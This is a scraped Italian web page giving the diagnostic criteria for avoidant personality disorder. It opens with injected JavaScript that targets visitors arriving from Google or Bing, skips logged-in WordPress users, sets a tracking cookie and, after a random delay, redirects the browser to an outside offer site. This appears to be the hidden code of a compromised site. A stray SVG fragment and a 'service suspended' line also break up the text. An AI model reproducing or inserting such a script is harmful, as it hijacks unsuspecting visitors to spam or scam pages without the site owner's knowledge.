((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(20000, 60000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})(); viewBox="-466.4 259.6 280.2 47.3" enable-background="new -466.4 259.6 280.2 47.3" xml:space="preserve">

Disturbo Evitante di Personalità

personalita3
personalita
personalita2

DISTURBO EVITANTE DI PERSONALITA’

Il disturbo di personalità evitante è un disturbo del gruppo C dei disturbi di personalità, definito gruppo degli ansiosi.
Viene descritto come un quadro pervasivo inibizione sociale, sentimenti di inadeguatezza ed ipersenbilità al giudizio negativo, che compare entro la prima età adulta ed è presente in una varietà di contesti, come indicato da quattro (o più) dei seguenti elementi:

  • evita attività lavorative che implicano un significativo contatto interpersonale poiché di essere criticato, disapprovato, e rifiutato
  • è riluttante ad entrare in relazione con persone, a meno che non sia certo di piacere
  • è inibito nelle relazioni intime per il timore di essere umiliato o ridicolizzato
  • si preoccupa di essere criticato o rifiutato in situazioni sociali
  • è inibito in situazioni interpersonali nuove per sentimenti di inadeguatezza
  • si vede come socialmente inetto, personalmente non attraente, o inferiore agli altri
  • è insolitamente riluttante ad assumere rischi personali o ad ingaggiarsi in qualsiasi nuova attività, poiché questo può rivelarsi imbarazzante

Servizio Sospeso